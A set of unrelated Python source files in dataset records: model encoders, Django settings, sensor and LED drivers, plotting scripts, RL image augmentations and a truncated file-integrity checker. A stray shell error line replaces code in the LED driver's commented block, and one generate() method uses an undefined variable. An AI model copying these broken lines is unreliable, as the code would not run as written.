self.text_encoder.t5.encoder(\n\t\t\t\tinput_ids=text_id,\n\t\t\t\tattention_mask=text_mask,\n\t\t\t)\n\t\t\tX = X.last_hidden_state\n\t\t\tmask_expanded = text_mask.unsqueeze(-1).expand(X.size()).float()\n\t\t\tX_cls = torch.sum(X * mask_expanded, dim=1)/ mask_expanded.sum(dim=1)\n\t\t\tX_mask = text_mask.bool()\n\t\telse:\n\t\t\tX, X_cls, X_mask = self.text_encoder(text_id, mask=text_mask, pool=self.to_pool)\n\t\tif self.to_pool:\n\t\t\tX, ret = self.text_pooler(X_cls, X, mask=X_mask)\n\t\t\tX_mask = torch.ones(X.shape[:2], device=X.device).long()\n\t\t\tX_encode.update(ret)\n\t\tX_encode['embedding'] = X\n\t\tX_encode['cls_embedding'] = X_cls\n\t\tX_encode['mask'] = X_mask.long()\n\t\treturn X_encode\n\n\tdef decode(self, X_encode):\n\t\tif isinstance(self.text_encoder, T5Adapter):\n\t\t\tX_out, X_label = self.text_encoder(**X_encode)\n\t\telse:\n\t\t\tX_out, X_label = self.text_decoder(**X_encode)\n\t\tX_decode = {\n\t\t\t'loss': X_out['loss'],\n\t\t\t'logits': X_out['logits'][..., :-1, :].contiguous(),\n\t\t\t'label': X_label[..., 1:].contiguous(),\n\t\t}\n\t\treturn X_decode\n\n\tdef generate(self, batch, X_encode, **kwargs):\n\t\tX_generate = {k:v for k,v in batch.items() if k not in NUMERICS}\n\t\tif isinstance(self.text_encoder, T5Adapter):\n\t\t\tgenerations = self.text_encoder.generate(**X)\n\t\telse:\n\t\t\tgenerations = self.text_decoder.generate(**X_encode, **kwargs)\n\t\tX_generate['generated'] = generations\n\t\treturn X_generate\n","repo_name":"khanhnguyen21006/wikipedia_captioning","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27750643882","text":"from django.utils.translation import gettext_lazy as _\n\naplikasi = {\n 'project': 'FINCAPES',\n 'portal_app': _('FINCAPES Project'),\n 'portal_name': 'FINCAPESPortal',\n 'domain': 'fincapes.com',\n 'required': '*',\n 'version': 'alpha 1.0'\n}\n\nCURRENCY_CHOICES = (\n (1, 'CAD'),\n (2, 'IDR'),\n (3, 'USD')\n)\n\nSTATUS_CHOICES = (\n (1, 'draft'),\n (2, 'active')\n)\n\nDONOR_STATUS_CHOICES = (\n (0, 'Draft'),\n (1, 'Active'),\n (2, 'Inactive')\n)\n\nDONOR_TYPE_CHOICES = (\n (1, _('Government')),\n (2, _('Private/Business'))\n)\n\nlanguages = (\n ('id', _('Indonesia')),\n ('en', _('English'))\n)\n\nmenu_setting = {\n 'change_password': _('Change Password'),\n 'sign_in': _('Sign in'),\n 'sign_out': _('Sign out'),\n 'sign_up': _('Register'),\n 'resend_activation': _('Resend activation'),\n 'activated': _('Activated'),\n 'add_new': _('Add New'),\n 'cancel': _('Cancel'),\n 'dashboard': _('Dashboard'),\n 'delete': _('Delete'),\n 'edit': _('Edit'),\n 'finish': _('Finish'),\n 'next': _('Next'),\n 'previous': _('Previous'),\n 'forgot_password': _('Forgot password'),\n 'reset_password': _('Reset Password'),\n 'user_profile': _('User Profile'),\n 'save': _('Save'),\n 'share': _('Share'),\n 'search': _('Search'),\n 'submit': _('Submit'),\n 'update': _('Update')\n}\n\nUSER_TYPE_CHOICES = (\n (1, 'FINCAPES'),\n (2, 'uWaterloo'),\n (3, _('Partners')),\n (4, _('Beneficiaries'))\n)\nUSER_CATEGORY_CHOICES = (\n (1, _('Director')),\n (2, _('Program Officer')),\n (3, _('Administrative')),\n (4, _('Finance'))\n)\n\nGENDER_CHOICES = (\n (1, _('Female')),\n (2, _('Male'))\n)\n\nTIMEZONES = (\n ('Canada/Atlantic', 'Canada/Atlantic'),\n ('Canada/Central', 'Canada/Central'),\n ('Canada/Eastern', 'Canada/Eastern'),\n ('Canada/Mountain', 'Canada/Mountain'),\n ('Canada/Newfoundland', 'Canada/Newfoundland'),\n ('Canada/Pacific', 'Canada/Pacific'),\n ('Canada/Saskatchewan', 'Canada/Saskatchewan'),\n ('Canada/Yukon', 'Canada/Yukon'),\n ('Asia/Jakarta', 'Jakarta/WIB'),\n ('Asia/Makassar', 'Makassar/WITA'),\n ('Asia/Jayapura', 'Jayapura/WIT'),\n)\n\nlabel_settings = {\n 'no_data_available': _('No data available'),\n 'until': _('until'),\n 'page404': _('Sorry, this page not available'),\n 'please_select': _('---- Please select ----'),\n 'no_blank': _('%s should not be blank'),\n 'required': '*'\n}\n\nSELECT_WIDGET_ATTRS = {\n 'data-placeholder': label_settings.get('please_select'),\n 'data-minimum-results-for-search': 'Infinity',\n 'data-allow-clear': False\n}\nSELECT_WIDGET_MODEL_NO_SEARCH_ATTRS = {\n 'data-minimum-results-for-search': 'Infinity',\n \"data-minimum-input-length\": 0,\n \"data-allow-clear\": False\n}\nSELECT_WIDGET_MODEL_WITH_SEARCH_ATTRS = {\n # 'data-minimum-results-for-search': 'Infinity',\n \"data-minimum-input-length\": 0,\n \"data-allow-clear\": False\n}\n\nADDRESS_CHOICES = (\n (1, _('Office')),\n (2, _('Home')),\n)\n\npage_title = {\n 'project_info': _('Project Information')\n}\n\nsorted_str = \"abcdefghijklmnopqrstuvwxyz\"\nsorted_str_ = [x for x in sorted_str]\nCHOICES_STR = tuple(zip(sorted_str_, sorted_str_))","repo_name":"sangak/fincapes","sub_path":"fincapes/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19106019490","text":"import os\nimport glob\nimport time\n\n#os.system('modprobe w1-gpio')\n#os.system('modprobe w1-therm')\n\n\n\nclass TempReader:\n\n\tbase_dir = '/sys/bus/w1/devices/'\n\tbase_file = '/w1_slave'\n\tfolder_prefix = '28*'\n\n\n\tthermometers = []\n\n\tdef __init__(self, debug = False):\n\t\tdevice_folders = glob.glob(self.base_dir + self.folder_prefix)\n\t\tself._debug = debug\n\n\t\tfor folder in device_folders:\n\t\t\tt = Thermometer(folder, self.base_file)\n\t\t\tself.thermometers.append(t)\n\n\t\tif (self._debug):\n\t\t\tprint(\"there are \" + str(len(self.thermometers)) + \" theremometers connected\")\n\t\t\tfor therm in self.thermometers:\n\t\t\t\tprint(therm.getDeviceId())\n\n\n\tdef getThermometer(self, deviceId):\n\t\tfor t in self.thermometers:\n\t\t\tif t.getDeviceId() == deviceId:\n\t\t\t\treturn t\n\n\t\traise ThermometerException(deviceId)\n\t\t\n\n\n\nclass Thermometer:\n\n\t_device_file = ''\n\t_id = ''\n\n\tdef __init__(self, folder, base):\n\t\tself._device_file = folder + base\n\t\tself._id = os.path.split(folder)[1]\n\n\tdef getDeviceId(self):\n\t\treturn self._id\n\n\tdef read_temp_raw(self):\n\t\tf = open(self._device_file, 'r')\n\t\tlines = f.readlines()\n\t\tf.close()\n\t\treturn lines\n\n\tdef read_temp(self):\n\t\tlines = self.read_temp_raw()\n\t\twhile lines[0].strip()[-3:] != 'YES':\n\t\t\ttime.sleep(0.2)\n\t\t\tlines = self.read_temp_raw()\n\t\tequals_pos = lines[1].find('t=')\n\t\tif equals_pos != -1:\n\t\t\ttemp_string = lines[1][equals_pos+2:]\n\t\t\ttemp_c = float(temp_string) / 1000.0\n\t\t\treturn temp_c\n\n\n\nclass ThermometerException(Exception):\n\tdef __init__(self, deviceId):\n\t\tself.deviceId = deviceId\n\n\tdef __str__(self):\n\t\treturn \"The thermometer with id '\" + str(self.deviceId) + \"' is not found.\"\n\n\n","repo_name":"julienfastre/rasPyThermReader","sub_path":"temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19915507777","text":"from __future__ import division\nfrom __future__ import print_function\n# NeoPixel library strandtest example\n# Author: Tony DiCola (tony@tonydicola.com)\n#\n# Direct port of the Arduino NeoPixel library strandtest example. Showcases\n# various animations on a strip of NeoPixels.\nfrom builtins import range\nfrom past.utils import old_div\nimport time\nimport state\n\nfrom neopixel import *\n\n# Check for user imports\nimport config\n\n\n\n# LED strip configuration:\nLED_COUNT = 8 # Number of LED pixels.\nLED_PIN = config.pixelPin # GPIO pin connected to the pixels (must support PWM!).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0\nLED_STRIP = ws.SK6812_STRIP_RGBW\n#LED_STRIP = ws.SK6812W_STRIP\n\n\n# Define functions which animate LEDs in various ways.\ndef colorWipe(strip, color, wait_ms=50):\n\t\"\"\"Wipe color across display a pixel at a time.\"\"\"\n\tfor i in range(strip.numPixels()):\n\t\tstrip.setPixelColor(i, color)\n\t\tstrip.show()\n\t\ttime.sleep(wait_ms/1000.0)\n\ndef theaterChase(strip, color, wait_ms=50, iterations=10):\n\t\"\"\"Movie theater light style chaser animation.\"\"\"\n\tfor j in range(iterations):\n\t\tfor q in range(3):\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, color)\n\t\t\tstrip.show()\n\t\t\ttime.sleep(wait_ms/1000.0)\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, 0)\n\ndef wheel(pos):\n\t\"\"\"Generate rainbow colors across 0-255 positions.\"\"\"\n\tif pos < 85:\n\t\treturn Color(pos * 3, 255 - pos * 3, 0)\n\telif pos < 170:\n\t\tpos -= 85\n\t\treturn Color(255 - pos * 3, 0, pos * 3)\n\telse:\n\t\tpos -= 170\n\t\treturn Color(0, pos * 3, 255 - pos * 3)\n\ndef rainbow(strip, wait_ms=20, iterations=1):\n\t\"\"\"Draw rainbow that fades across all pixels at once.\"\"\"\n\tfor j in range(256*iterations):\n\t\tfor i in range(strip.numPixels()):\n\t\t\tstrip.setPixelColor(i, wheel((i+j) & 255))\n\t\tstrip.show()\n\t\ttime.sleep(wait_ms/1000.0)\n\ndef rainbowCycle(strip, wait_ms=20, iterations=5):\n\t\"\"\"Draw rainbow that uniformly distributes itself across all pixels.\"\"\"\n\tfor j in range(256*iterations):\n\t\tfor i in range(strip.numPixels()):\n\t\t\tstrip.setPixelColor(i, wheel(((old_div(i * 256, strip.numPixels())) + j) & 255))\n\t\tstrip.show()\n\t\ttime.sleep(wait_ms/1000.0)\n\ndef theaterChaseRainbow(strip, wait_ms=50):\n\t\"\"\"Rainbow movie theater light style chaser animation.\"\"\"\n\tfor j in range(256):\n\t\tfor q in range(3):\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, wheel((i+j) % 255))\n\t\t\tstrip.show()\n\t\t\ttime.sleep(wait_ms/1000.0)\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, 0)\n\n\n\ndef statusLEDs(strip, PixelLock):\n\n\n PixelLock.acquire()\n\n\n if (state.runLEDs == True):\n while (state.runRainbow == True):\n if (config.DEBUG):\n print(\"rainbow start\")\n rainbow(strip)\n #rainbowCycle(strip)\n #theaterChaseRainbow(strip)\n if (config.DEBUG):\n print(\"rainbow end\")\n\n for i in range(1,8):\n strip.setPixelColor(i,Color(0,0,0))\n\n time.sleep(0.2)\n strip.show()\n setDryness(strip, PixelLock)\n time.sleep(2.0)\n\n for i in range(1,8):\n strip.setPixelColor(i,Color(0,0,0))\n \n time.sleep(0.2)\n strip.show()\n setWaterLevel(strip, PixelLock)\n time.sleep(2.0)\n\n else:\n strip.setPixelColor(7,Color(0,0,0))\n strip.setPixelColor(6,Color(0,0,0))\n strip.setPixelColor(5,Color(0,0,0))\n strip.setPixelColor(4,Color(0,0,0))\n strip.setPixelColor(3,Color(0,0,0))\n strip.setPixelColor(2,Color(0,0,0))\n strip.setPixelColor(1,Color(0,0,0))\n strip.setPixelColor(0,Color(0,0,0))\n strip.show()\n\n PixelLock.release()\n\n\ndef setDryness(strip, PixelLock):\n\n \"\"\" uses 7 top pixels \"\"\"\n # 0 - 1/2 of set level- bottom two - RED\n # 1/2 - set level middle three - YELLOW\n # set equal above set level top = Green\n\n if (state.Moisture_Humidity > state.Moisture_Threshold):\n\n strip.setPixelColor(7,Color(255,0,0))\n strip.setPixelColor(6,Color(100,255,0))\n strip.setPixelColor(5,Color(100,255,0))\n strip.setPixelColor(4,Color(100,255,0))\n strip.setPixelColor(3,Color(0,255,0))\n strip.setPixelColor(2,Color(0,255,0))\n strip.setPixelColor(1,Color(0,255,0))\n\n else: \n if (state.Moisture_Humidity > state.Moisture_Threshold/2.0):\n\n count = int(old_div(( state.Moisture_Humidity-state.Moisture_Threshold/2.0),(3.0*state.Moisture_Threshold/2.0))) +1\n strip.setPixelColor(7,Color(0,0,0))\n if (count >2):\n strip.setPixelColor(6,Color(100,255,0))\n else:\n strip.setPixelColor(6,Color(0,0,0))\n if (count >1):\n strip.setPixelColor(5,Color(100,255,0))\n else:\n strip.setPixelColor(5,Color(0,0,0))\n if (count >0):\n strip.setPixelColor(4,Color(100,255,0))\n else:\n strip.setPixelColor(4,Color(0,0,0))\n\n strip.setPixelColor(3,Color(0,255,0))\n strip.setPixelColor(2,Color(0,255,0))\n strip.setPixelColor(1,Color(0,255,0))\n \n else:\n\n strip.setPixelColor(7,Color(0,0,0))\n strip.setPixelColor(6,Color(0,0,0))\n strip.setPixelColor(5,Color(0,0,0))\n strip.setPixelColor(4,Color(0,0,0))\n count = int(old_div(( state.Moisture_Humidity),((state.Moisture_Threshold/2.0)/3.0))) +1\n if (count >2):\n strip.setPixelColor(3,Color(0,255,0))\n else:\n strip.setPixelColor(3,Color(0,0,0))\n if (count >1):\n strip.setPixelColor(2,Color(0,255,0))\n else:\n strip.setPixelColor(2,Color(0,0,0))\n if (count >0):\n strip.setPixelColor(1,Color(0,255,0))\n else:\n strip.setPixelColor(1,Color(0,0,0))\n\n \n\n\n strip.show()\n\n\ndef setWaterLevel(strip, PixelLock):\n\n\n \"\"\" uses 7 top pixels \"\"\"\n # all 7 green until under 1/7 of level, step by 1/7 - then all black except for 1 - RED\n\n\n\n count = int (state.Tank_Percentage_Full/14.0)\n\n \n\n for i in range(2,count+1):\n strip.setPixelColor(i,Color(255,0,0))\n\n strip.setPixelColor(1,Color(0,255,0))\n\n \n\n\n strip.show()\n\n\n\"\"\"\n\n# Main program logic follows:\nif __name__ == '__main__':\n\t# Create NeoPixel object with appropriate configuration.\n\tstrip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)\n\t# Intialize the library (must be called once before other functions).\n\tstrip.begin()\n\n\tprint ('Press Ctrl-C to quit.')\n/bin/bash: tx: command not found\n\t\t# Color wipe animations.\n\t\tcolorWipe(strip, Color(255, 0, 0)) # Red wipe\n\t\tcolorWipe(strip, Color(0, 255, 0)) # Blue wipe\n\t\tcolorWipe(strip, Color(0, 0, 255)) # Green wipe\n\t\tcolorWipe(strip, Color(0, 0, 0, 255)) # White wipe\n\t\tcolorWipe(strip, Color(255, 255, 255)) # Composite White wipe\n\t\tcolorWipe(strip, Color(255, 255, 255, 255)) # Composite White + White LED wipe\n\t\t# Theater chase animations.\n\t\ttheaterChase(strip, Color(127, 0, 0)) # Red theater chase\n\t\ttheaterChase(strip, Color(0, 127, 0)) # Green theater chase\n\t\ttheaterChase(strip, Color(0, 0, 127)) # Blue theater chase\n\t\ttheaterChase(strip, Color(0, 0, 0, 127)) # White theater chase\n\t\ttheaterChase(strip, Color(127, 127, 127, 0)) # Composite White theater chase\n\t\ttheaterChase(strip, Color(127, 127, 127, 127)) # Composite White + White theater chase\n\t\t# Rainbow animations.\n\t\trainbow(strip)\n\t\trainbowCycle(strip)\n\t\ttheaterChaseRainbow(strip)\n\n\n\"\"\"\n","repo_name":"switchdoclabs/SDL_Pi_SmartGardenSystem2","sub_path":"pixelDriver.py","file_name":"pixelDriver.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"2221860620","text":"import serial\nimport time\n\narduino = serial.Serial('COM3',9600)\n\n\n\nprint(\"enter 1 for 180, or 0 for 0:\")\n\nwhile 1:\n datafrom = input()\n\n if datafrom == '1':\n arduino.write(b'1')\n print(\"done\")\n elif datafrom == '0':\n arduino.write(b'0')\n print(\"done\")\n else:\n break\n\n","repo_name":"dreadbean/Better-Hand","sub_path":"hand_test_code/Serial_com_arduino.py","file_name":"Serial_com_arduino.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13299267169","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nplt.rcParams['axes.facecolor'] = '#dddddd'\nplt.rcParams['axes.grid'] = True\nplt.rcParams['grid.alpha'] = 1\nplt.rcParams['grid.linewidth'] = 1\nplt.rcParams['grid.color'] = \"#ffffff\"\nplt.rcParams['axes.axisbelow'] = True\nlabel_color = '#000000'\nprimaryColor = '#20639b'\nplt.rcParams['text.color'] = label_color\nplt.rcParams['axes.labelcolor'] = label_color\nplt.rcParams['xtick.color'] = label_color\nplt.rcParams['ytick.color'] = label_color\n \ntriple_stats = pd.read_csv(os.getcwd() + \"/analysis/data/split_statistics/triples.csv\")\nbias_stats = pd.read_csv(os.getcwd() + \"/analysis/data/bias_affected_triples/combined.csv\")\nbias_test_stats = pd.read_csv(os.getcwd() + \"/analysis/data/bias_affected_triples/test.csv\")\nbias_training_stats = pd.read_csv(os.getcwd() + \"/analysis/data/bias_affected_triples/train.csv\")\nbias_validation_stats = pd.read_csv(os.getcwd() + \"/analysis/data/bias_affected_triples/validation.csv\")\ndatasets = triple_stats[\"dataset\"].to_list()\nbias_types = list(bias_stats)[1:]\ndataset_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountTotal\"].values[0] for dataset in datasets}\ntest_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountTest\"].values[0] for dataset in datasets}\ntraining_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountTraining\"].values[0] for dataset in datasets}\nvalidation_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountValidation\"].values[0] for dataset in datasets}\n\nbiased_triples = {dataset: [bias_stats.loc[bias_stats['dataset'] == dataset][biasType].values[0]/dataset_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nbiased_test_triples = {dataset: [bias_test_stats.loc[bias_test_stats['dataset'] == dataset][biasType].values[0]/test_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nbiased_training_triples = {dataset: [bias_training_stats.loc[bias_training_stats['dataset'] == dataset][biasType].values[0]/training_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nbiased_validation_triples = {dataset: [bias_validation_stats.loc[bias_validation_stats['dataset'] == dataset][biasType].values[0]/validation_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nlabels_mapping = {\"overrepresentedTail\" : \"overrepr. tail\", \"overrepresentedHead\" : \"overrepr. head\", \n\"defaultTailAnswers\": \"default tail\", \"defaultHeadAnswers\": \"default head\",\n\"duplicateRelations\": \"near-duplicate\",\n\"inverseRelations\": \"near-inverse\",\n\"symmetricalRelations\": \"near-symmetric\"\n} \nfor dataset in biased_triples:\n x = [labels_mapping[bias] for bias in bias_types]\n ind = np.arange(len(x)) \n data_combined = biased_triples[dataset]\n data_training = biased_training_triples[dataset]\n data_validation = biased_validation_triples[dataset]\n data_test = biased_test_triples[dataset]\n\n width = 0.15\n fig, ax = plt.subplots()\n \n ax.bar(x, data_combined, width, color=primaryColor,label=\"Combined\")\n ax.bar(ind + width, data_training, width, color='#3caea4', label='Training')\n ax.bar(ind - 2*width, data_validation, width, color='#e8c442', label='Validation')\n ax.bar(ind - width, data_test, width, color='#ed553b', label='Test')\n\n #fig.suptitle(dataset,fontsize=12, fontweight=\"bold\",)\n ax.set_title(dataset, fontsize=14, fontweight=\"bold\")\n ax.set_ylabel('Bias occurrence (from 0 to 1)', fontsize=12, labelpad=10)\n\n #set tick parameters \n ax.tick_params(labelbottom=True)\n ax.set_ylim(0, 1.0)\n ax.legend(facecolor='white', framealpha=1) \n plt.rc('xtick', labelsize=12) # fontsize of the tick labels\n plt.rc('ytick', labelsize=12) \n plt.xticks(rotation=90)\n output_dir = \"output_new/pattern_analysis\"\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n plt.savefig(\"{}/{}.png\".format(output_dir, dataset), bbox_inches=\"tight\", dpi=300)\n plt.show()\n\n\n","repo_name":"SDM-TIB/LinkPredBias","sub_path":"analysis/generate_bias_plots.py","file_name":"generate_bias_plots.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16802074838","text":"import numpy as np\nfrom skimage.util.shape import view_as_windows\nimport torch\nimport random\nfrom kornia import augmentation as K\n\nclass IdentityAugmentation:\n def __init__(self, input_shape):\n assert len(input_shape) == 2, \"Input shape must be 2D\"\n self.input_shape = input_shape\n self.output_shape = input_shape\n\n def evaluation_augmentation(self, image):\n return image\n\n def training_augmentation(self, image_batch):\n return image_batch\n\n\nclass RandomCrop(IdentityAugmentation):\n def __init__(self, input_shape):\n super().__init__(input_shape)\n self.cropping_factor = 0.84\n self.output_shape = tuple(int(np.ceil(x*self.cropping_factor)) for x in self.input_shape)\n\n def evaluation_augmentation(self, image):\n '''\n Performs a center crop on the input image to the output shape\n\n Args:\n image: Image with shape (channels*frame_stack, height, width)\n Returns:\n cropped_image: Center cropped image with shape (channels*frame_stack, *self.output_shape)\n '''\n\n # Get image shapes and crop sizes\n h, w = self.input_shape\n new_h, new_w = self.output_shape\n top = (h - new_h)//2\n left = (w - new_w)//2\n\n # Perform center crop\n cropped_image = image[:, top:top + new_h, left:left + new_w]\n\n return cropped_image\n\n def training_augmentation(self, image_batch):\n '''\n Performs random cropping on a batch of images in a vectorized \n way using sliding windows and picking out random ones\n\n Args:\n image_batch: Batch of images with shape (batch_size, channels*frame_stack, height, width)\n Returns:\n augmented_batch: Batch of randomly cropped images with shape (batch_size, channels*frame_stack, *self.output_shape)\n '''\n\n # Batch size\n n = image_batch.shape[0]\n\n # Determine cropping possibilities\n img_shape = image_batch.shape[2:4]\n crop_max_h = img_shape[0] - self.output_shape[0]\n crop_max_w = img_shape[1] - self.output_shape[1]\n image_batch = np.transpose(image_batch, (0, 2, 3, 1))\n h1 = np.random.randint(0, crop_max_h, n)\n w1 = np.random.randint(0, crop_max_w, n)\n\n # Creates all sliding windows combinations of size (output_size)\n windows = view_as_windows(image_batch, (1, self.output_shape[0], self.output_shape[1], 1))[..., 0,:,:, 0] # @TODO: Check correctness!\n\n # Selects a random window for each batch element\n augmented_batch = windows[np.arange(n), h1, w1]\n\n return augmented_batch\n \n\nclass ColorJiggle(IdentityAugmentation):\n\n def __init__(self, input_shape):\n super().__init__(input_shape)\n self.output_shape = self.input_shape\n \n # Define the ColorJiggle augmentation with 85% probability\n self.aug = K.ColorJiggle(brightness=0.0, \n contrast=0.2, \n saturation=0.5, \n hue=0.5, \n same_on_batch=False, \n p=0.85, \n keepdim=True)\n\n\n def evaluation_augmentation(self, image):\n '''\n Returns the original image\n\n Args:\n image: Image with shape (channels*frame_stack, height, width)\n Returns:\n image: Image with shape (channels*frame_stack, height, width)\n '''\n\n return image\n \n def training_augmentation(self, image_batch):\n '''\n Applies a random transformation to the brightness, contrast, saturation \n and hue of the image batch\n\n Args:\n image_batch: Batch of images with shape (batch_size, channels*frame_stack, height, width)\n Returns:\n image_batch: Batch of color jiggled images with shape (batch_size, channels*frame_stack, height, width)\n '''\n\n # Normalize image batch to [0, 1]\n image_batch /= 255.0\n\n # Each image in the batch is actually a frame stack of `frame_stack` images,\n # resulting in a tensor of shape (batch_size, channels*frame_stack, height, width),\n # which is not compatible with the augmentation function. Therefore, we reshape\n # the batch to (batch_size*frame_stack, channels, height, width)\n frame_stack = image_batch.shape[1]//3\n image_batch = image_batch.reshape(-1, 3, *self.input_shape)\n\n # Perform color jiggling augmentation on batch\n image_batch = self.aug(image_batch)\n\n # Reshape batch back to original shape\n image_batch = image_batch.reshape(-1, 3*frame_stack, self.input_shape[0], self.input_shape[1])\n\n # Denormalize image batch back to [0, 255]\n image_batch *= 255.0\n\n return image_batch\n \nclass NoisyCover(IdentityAugmentation):\n \n def __init__(self, input_shape):\n super().__init__(input_shape)\n self.output_shape = self.input_shape\n top_ratio = 0.31\n bottom_ratio = 0.20\n self.h = self.input_shape[0]\n self.top = int(np.ceil(self.h * top_ratio))\n self.bottom = int(np.ceil(self.h * bottom_ratio))\n\n # Indexes of rows of the image that should get covered\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.cover_indexes = torch.tensor(np.concatenate((np.arange(0, self.top), \n np.arange(self.h-self.bottom, self.h))), \n dtype=torch.int64, \n device=device)\n \n # Define the RandomGaussianNoise augmentation with 100% probability\n self.aug = K.RandomGaussianNoise(mean=0.0, std=10.0, p=1.0)\n\n\n def evaluation_augmentation(self, image):\n '''\n Returns the original image\n\n Args:\n image: Image with shape (channels*frame_stack, height, width)\n Returns:\n image: Image with added Gaussian noise with shape (channels*frame_stack, height, width)\n '''\n\n return image\n \n def training_augmentation(self, image_batch):\n '''\n Applies a random transformation to the brightness, contrast, saturation \n and hue of the image batch\n\n Args:\n image_batch: Batch of images with shape (batch_size, channels*frame_stack, height, width)\n Returns:\n image_batch: Batch of partially covered (by blocks of a random color), noisy images \n with shape (batch_size, channels*frame_stack, height, width)\n '''\n\n # Each image in the batch is actually a frame stack of `frame_stack` images,\n # resulting in a tensor of shape (batch_size, channels*frame_stack, height, width),\n # which is not compatible with the augmentation function. Therefore, we reshape\n # the batch to (batch_size*frame_stack, channels, height, width)\n frame_stack = image_batch.shape[1]//3\n image_batch = image_batch.reshape(-1, 3, *self.input_shape)\n\n # Cover top and bottom of image with random color\n image_batch[:, 0, :, :].index_fill_(1, self.cover_indexes, np.random.randint(0, 255))\n image_batch[:, 1, :, :].index_fill_(1, self.cover_indexes, np.random.randint(0, 255))\n image_batch[:, 2, :, :].index_fill_(1, self.cover_indexes, np.random.randint(0, 255))\n\n # Add gaussian noise to the image\n image_batch = self.aug(image_batch)\n\n # Reshape batch back to original shape\n image_batch = image_batch.reshape(-1, 3*frame_stack, self.input_shape[0], self.input_shape[1])\n\n # Clip values to [0, 255] with torch.clamp\n image_batch = torch.clamp(image_batch, 0, 255)\n\n return image_batch\n \n\ndef make_augmentor(name, input_shape):\n print(f'CHOSEN AUGMENTATION: {name}')\n augmentor = None\n if name == 'identity':\n augmentor = IdentityAugmentation(input_shape)\n elif name == 'random_crop':\n augmentor = RandomCrop(input_shape)\n elif name == 'color_jiggle':\n augmentor = ColorJiggle(input_shape)\n elif name == 'noisy_cover':\n augmentor = NoisyCover(input_shape)\n else:\n raise ValueError('augmentation is not supported: %s' % name)\n return augmentor\n","repo_name":"paulvantieghem/curla","sub_path":"augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":8378,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"29131480023","text":"#/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport os\nimport platform\nimport hashlib\nimport codecs\nimport json\nimport smtplib\n\n#import configparser, os\n\n\nnuevo= dict()\nsettingsf=open(\"settings.json\")\nsettings=json.load(settingsf)\n\n\nfirst_run=settings[\"first_run\"]\ndirs2check=settings[\"direcorios_a_revisar\"]\ndigest_path=settings[\"digest_path\"]\ngmail_user=settings[\"gmail_user\"]\ngmail_passwd=settings[\"gmail_passwd\"]\ndestination=settings[\"destination\"]\n\nfor d in dirs2check:\n for path, dirs, files in os.walk(d ):\n for f in files:\n archivo= codecs.open(path+'/'+f,'rb')\n nuevo[path+'/'+f]= hashlib.sha256(archivo.read()).hexdigest()\nif(first_run):\n archivo=open(digest_path,'w')\n json_data = json.dump(nuevo,archivo, sort_keys=True, indent=4)\n archivo.close()\n\narchivo=open(digest_path,'r')\n#contenido=archivo.read()\nantiguo=json.load(archivo)\n#print(yeison[\"/home/gabriel/ownCloud/workspace/HighfredoBot/.git/COMMIT_EDITMSG\"])\n\n#print(antiguo==nuevo)\n\n\nKEYNOTFOUND = 'NO_FILE' # KeyNotFound for dictDiff\n\ndef dict_diff(first, second):#Metodo encontrado en internet\n\n \"\"\" Return a dict of keys that differ with another config object. If a value is\n not found in one fo the configs, it will be represented by KEYNOTFOUND.\n @param first: Fist dictionary to diff.\n @param second: Second dicationary to diff.\n @return diff: Dict of Key => (first.val, second.val)\n \"\"\"\n diff = {}\n # Check all keys in first dict\n for key in first.keys():\n if (not key in second):\n diff[key] = (first[key], KEYNOTFOUND)\n elif (first[key] != second[key]):\n diff[key] = (first[key], second[key])\n # Check all keys in second dict to find missing\n for key in second.keys():\n if (not key in first):\n diff[key] = (KEYNOTFOUND, second[key])\n return diff\ndiferencia=dict_diff(antiguo,nuevo)\n\nborrados=0\nnuevos=0\nfor a in diferencia:\n if diferencia[a][0]==KEYNOTFOUND:\n nuevos=nuevos+1\n if diferencia[a][1]==KEYNOTFOUND:\n borrados=borrados+1\n\n\nSUBJECT = 